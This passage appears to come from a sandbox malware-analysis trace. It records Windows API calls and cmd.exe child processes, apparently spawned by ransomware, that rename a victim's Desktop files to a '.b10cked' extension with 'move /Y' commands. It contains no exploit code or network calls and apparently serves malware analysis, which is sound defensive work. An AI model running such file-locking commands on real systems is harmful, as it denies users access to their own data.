(_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0220.488] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0220.488] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0220.488] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0220.488] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0220.488] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0220.488] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0220.488] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0220.488] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0220.488] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0220.488] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0220.488] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0220.488] _wcsicmp (_String1="Bwuwh.wav", _String2=".") returned 52 [0220.488] _wcsicmp (_String1="Bwuwh.wav", _String2="..") returned 52 [0220.488] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav" (normalized: "c:\\users\\eebsym5\\desktop\\bwuwh.wav")) returned 0x20 [0220.488] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2a1d28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.488] SetErrorMode (uMode=0x0) returned 0x0 [0220.488] SetErrorMode (uMode=0x1) returned 0x0 [0220.488] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav", nBufferLength=0x104, lpBuffer=0x1cf13c, lpFilePart=0x1cf124 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav", lpFilePart=0x1cf124*="Bwuwh.wav") returned 0x22 [0220.488] SetErrorMode (uMode=0x0) returned 0x1 [0220.489] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.489] _wcsicmp (_String1="Bwuwh.wav", _String2=".") returned 52 [0220.489] _wcsicmp (_String1="Bwuwh.wav", _String2="..") returned 52 [0220.489] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav" (normalized: "c:\\users\\eebsym5\\desktop\\bwuwh.wav")) returned 0x20 [0220.489] SetErrorMode (uMode=0x0) returned 0x0 [0220.489] SetErrorMode (uMode=0x1) returned 0x0 [0220.489] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav", nBufferLength=0x104, lpBuffer=0x1cf5b8, lpFilePart=0x1cf350 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav", lpFilePart=0x1cf350*="Bwuwh.wav") returned 0x22 [0220.489] SetErrorMode (uMode=0x0) returned 0x1 [0220.489] SetErrorMode (uMode=0x0) returned 0x0 [0220.489] SetErrorMode (uMode=0x1) returned 0x0 [0220.489] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav.b10cked", nBufferLength=0x104, lpBuffer=0x1cf7c0, lpFilePart=0x1cf350 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav.b10cked", lpFilePart=0x1cf350*="Bwuwh.wav.b10cked") returned 0x2a [0220.489] SetErrorMode (uMode=0x0) returned 0x1 [0220.489] SetLastError (dwErrCode=0x0) [0220.489] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\bwuwh.wav.b10cked")) returned 0xffffffff [0220.489] GetLastError () returned 0x2 [0220.489] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav", fInfoLevelId=0x1, lpFindFileData=0x1ceccc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceccc) returned 0x2a2198 [0220.489] FindNextFileW (in: hFindFile=0x2a2198, lpFindFileData=0x1ceccc | out: lpFindFileData=0x1ceccc) returned 0 [0220.490] GetLastError () returned 0x12 [0220.490] FindClose (in: hFindFile=0x2a2198 | out: hFindFile=0x2a2198) returned 1 [0220.491] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav", fInfoLevelId=0x1, lpFindFileData=0x2a1ac8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2a1ac8) returned 0x2a2198 [0220.491] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav.b10cked", nBufferLength=0x104, lpBuffer=0x1cef64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav.b10cked", lpFilePart=0x0) returned 0x2a [0220.491] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav", nBufferLength=0x104, lpBuffer=0x1cef64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav", lpFilePart=0x0) returned 0x22 [0220.491] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav" (normalized: "c:\\users\\eebsym5\\desktop\\bwuwh.wav")) returned 0x20 [0220.491] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav" (normalized: "c:\\users\\eebsym5\\desktop\\bwuwh.wav"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\bwuwh.wav.b10cked"), dwFlags=0x3) returned 1 [0220.491] FindClose (in: hFindFile=0x2a2198 | out: hFindFile=0x2a2198) returned 1 [0220.492] _vsnwprintf (in: _Buffer=0x4a1e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1cef18 | out: _Buffer=" 1") returned 9 [0220.492] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.492] GetFileType (hFile=0x7) returned 0x2 [0220.492] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0220.492] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ceea4 | out: lpMode=0x1ceea4) returned 1 [0220.492] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.492] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ceed8 | out: lpConsoleScreenBufferInfo=0x1ceed8) returned 1 [0220.492] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0220.492] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x1cef18 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0220.493] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a1f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1ceefc, lpReserved=0x0 | out: lpBuffer=0x4a1f4640*, lpNumberOfCharsWritten=0x1ceefc*=0x1a) returned 1 [0220.493] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.493] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0220.493] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.493] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0220.493] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.493] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0220.493] SetConsoleInputExeNameW () returned 0x1 [0220.493] GetConsoleOutputCP () returned 0x1b5 [0220.493] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.493] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.494] exit (_Code=0) Process: id = "576" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c80" os_pid = "0x520" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\CKLVAY~1.FLV\" \"C:\\Users\\EEBsYm5\\Desktop\\CKLvAyoW1loaz.flv.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32924 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32925 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32926 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32927 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 32928 start_va = 0x4a1c0000 end_va = 0x4a20bfff entry_point = 0x4a1c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32929 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32930 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32931 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32932 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 32933 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33248 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33249 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33250 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33251 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 33252 start_va = 0x650000 end_va = 0x65ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 33253 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33254 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33255 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33256 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33257 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33258 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33259 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33260 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33261 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33262 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 33263 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33264 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33265 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 33266 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 33267 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 33268 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 33269 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 33270 start_va = 0x660000 end_va = 0x125ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 33271 start_va = 0x1260000 end_va = 0x13c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001260000" filename = "" Thread: id = 780 os_tid = 0xf58 [0220.885] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ef9e4 | out: lpSystemTimeAsFileTime=0x2ef9e4*(dwLowDateTime=0xb874ebe0, dwHighDateTime=0x1d440a9)) [0220.885] GetCurrentProcessId () returned 0x520 [0220.885] GetCurrentThreadId () returned 0xf58 [0220.885] GetTickCount () returned 0x3da18 [0220.885] QueryPerformanceCounter (in: lpPerformanceCount=0x2ef9dc | out: lpPerformanceCount=0x2ef9dc*=27767406477) returned 1 [0220.886] GetModuleHandleA (lpModuleName=0x0) returned 0x4a1c0000 [0220.886] __set_app_type (_Type=0x1) [0220.886] __p__fmode () returned 0x76b331f4 [0220.886] __p__commode () returned 0x76b331fc [0220.886] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1e21a6) returned 0x0 [0220.886] __getmainargs (in: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c, _DoWildCard=0, _StartInfo=0x4a1e4140 | out: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c) returned 0 [0220.886] GetCurrentThreadId () returned 0xf58 [0220.886] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf58) returned 0x38 [0220.886] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.886] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0220.886] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.886] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0220.886] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ef974 | out: phkResult=0x2ef974*=0x0) returned 0x2 [0220.887] VirtualQuery (in: lpAddress=0x2ef9ab, lpBuffer=0x2ef944, dwLength=0x1c | out: lpBuffer=0x2ef944*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.887] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2ef944, dwLength=0x1c | out: lpBuffer=0x2ef944*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0220.887] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2ef944, dwLength=0x1c | out: lpBuffer=0x2ef944*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0220.887] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2ef944, dwLength=0x1c | out: lpBuffer=0x2ef944*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.887] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2ef944, dwLength=0x1c | out: lpBuffer=0x2ef944*(BaseAddress=0x2f0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xe0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0220.887] GetConsoleOutputCP () returned 0x1b5 [0220.887] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.887] SetConsoleCtrlHandler (HandlerRoutine=0x4a1de72a, Add=1) returned 1 [0220.887] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.887] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0220.887] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.887] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0220.888] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.888] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0220.888] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.888] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0220.888] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.888] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0220.888] GetEnvironmentStringsW () returned 0x3e0168* [0220.888] FreeEnvironmentStringsW (penv=0x3e0168) returned 1 [0220.889] GetEnvironmentStringsW () returned 0x3e0168* [0220.889] FreeEnvironmentStringsW (penv=0x3e0168) returned 1 [0220.889] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee8e4 | out: phkResult=0x2ee8e4*=0x40) returned 0x0 [0220.889] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee8ec, lpData=0x2ee8f0, lpcbData=0x2ee8e8*=0x1000 | out: lpType=0x2ee8ec*=0x0, lpData=0x2ee8f0*=0x90, lpcbData=0x2ee8e8*=0x1000) returned 0x2 [0220.889] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee8ec, lpData=0x2ee8f0, lpcbData=0x2ee8e8*=0x1000 | out: lpType=0x2ee8ec*=0x4, lpData=0x2ee8f0*=0x1, lpcbData=0x2ee8e8*=0x4) returned 0x0 [0220.889] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee8ec, lpData=0x2ee8f0, lpcbData=0x2ee8e8*=0x1000 | out: lpType=0x2ee8ec*=0x0, lpData=0x2ee8f0*=0x1, lpcbData=0x2ee8e8*=0x1000) returned 0x2 [0220.889] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee8ec, lpData=0x2ee8f0, lpcbData=0x2ee8e8*=0x1000 | out: lpType=0x2ee8ec*=0x4, lpData=0x2ee8f0*=0x0, lpcbData=0x2ee8e8*=0x4) returned 0x0 [0220.889] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee8ec, lpData=0x2ee8f0, lpcbData=0x2ee8e8*=0x1000 | out: lpType=0x2ee8ec*=0x4, lpData=0x2ee8f0*=0x40, lpcbData=0x2ee8e8*=0x4) returned 0x0 [0220.889] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee8ec, lpData=0x2ee8f0, lpcbData=0x2ee8e8*=0x1000 | out: lpType=0x2ee8ec*=0x4, lpData=0x2ee8f0*=0x40, lpcbData=0x2ee8e8*=0x4) returned 0x0 [0220.889] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee8ec, lpData=0x2ee8f0, lpcbData=0x2ee8e8*=0x1000 | out: lpType=0x2ee8ec*=0x0, lpData=0x2ee8f0*=0x40, lpcbData=0x2ee8e8*=0x1000) returned 0x2 [0220.889] RegCloseKey (hKey=0x40) returned 0x0 [0220.889] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee8e4 | out: phkResult=0x2ee8e4*=0x40) returned 0x0 [0220.889] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee8ec, lpData=0x2ee8f0, lpcbData=0x2ee8e8*=0x1000 | out: lpType=0x2ee8ec*=0x0, lpData=0x2ee8f0*=0x40, lpcbData=0x2ee8e8*=0x1000) returned 0x2 [0220.889] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee8ec, lpData=0x2ee8f0, lpcbData=0x2ee8e8*=0x1000 | out: lpType=0x2ee8ec*=0x4, lpData=0x2ee8f0*=0x1, lpcbData=0x2ee8e8*=0x4) returned 0x0 [0220.889] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee8ec, lpData=0x2ee8f0, lpcbData=0x2ee8e8*=0x1000 | out: lpType=0x2ee8ec*=0x0, lpData=0x2ee8f0*=0x1, lpcbData=0x2ee8e8*=0x1000) returned 0x2 [0220.889] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee8ec, lpData=0x2ee8f0, lpcbData=0x2ee8e8*=0x1000 | out: lpType=0x2ee8ec*=0x4, lpData=0x2ee8f0*=0x0, lpcbData=0x2ee8e8*=0x4) returned 0x0 [0220.889] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee8ec, lpData=0x2ee8f0, lpcbData=0x2ee8e8*=0x1000 | out: lpType=0x2ee8ec*=0x4, lpData=0x2ee8f0*=0x9, lpcbData=0x2ee8e8*=0x4) returned 0x0 [0220.889] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee8ec, lpData=0x2ee8f0, lpcbData=0x2ee8e8*=0x1000 | out: lpType=0x2ee8ec*=0x4, lpData=0x2ee8f0*=0x9, lpcbData=0x2ee8e8*=0x4) returned 0x0 [0220.890] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee8ec, lpData=0x2ee8f0, lpcbData=0x2ee8e8*=0x1000 | out: lpType=0x2ee8ec*=0x0, lpData=0x2ee8f0*=0x9, lpcbData=0x2ee8e8*=0x1000) returned 0x2 [0220.890] RegCloseKey (hKey=0x40) returned 0x0 [0220.890] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b6 [0220.890] srand (_Seed=0x5b8863b6) [0220.890] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\CKLVAY~1.FLV\" \"C:\\Users\\EEBsYm5\\Desktop\\CKLvAyoW1loaz.flv.b10cked\"" [0220.890] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\CKLVAY~1.FLV\" \"C:\\Users\\EEBsYm5\\Desktop\\CKLvAyoW1loaz.flv.b10cked\"" [0220.890] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.890] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3e18c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0220.890] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0220.891] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0220.891] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.891] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0220.891] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0220.891] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0220.891] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0220.891] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0220.891] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0220.891] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0220.891] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0220.891] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0220.891] GetEnvironmentStringsW () returned 0x3e22b8* [0220.891] FreeEnvironmentStringsW (penv=0x3e22b8) returned 1 [0220.891] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.891] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.891] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0220.891] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0220.891] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0220.891] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0220.891] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0220.891] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0220.891] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0220.891] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0220.892] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef6b0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.892] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef6b0, lpFilePart=0x2ef6ac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef6ac*="Desktop") returned 0x18 [0220.892] GetFileAttributesW 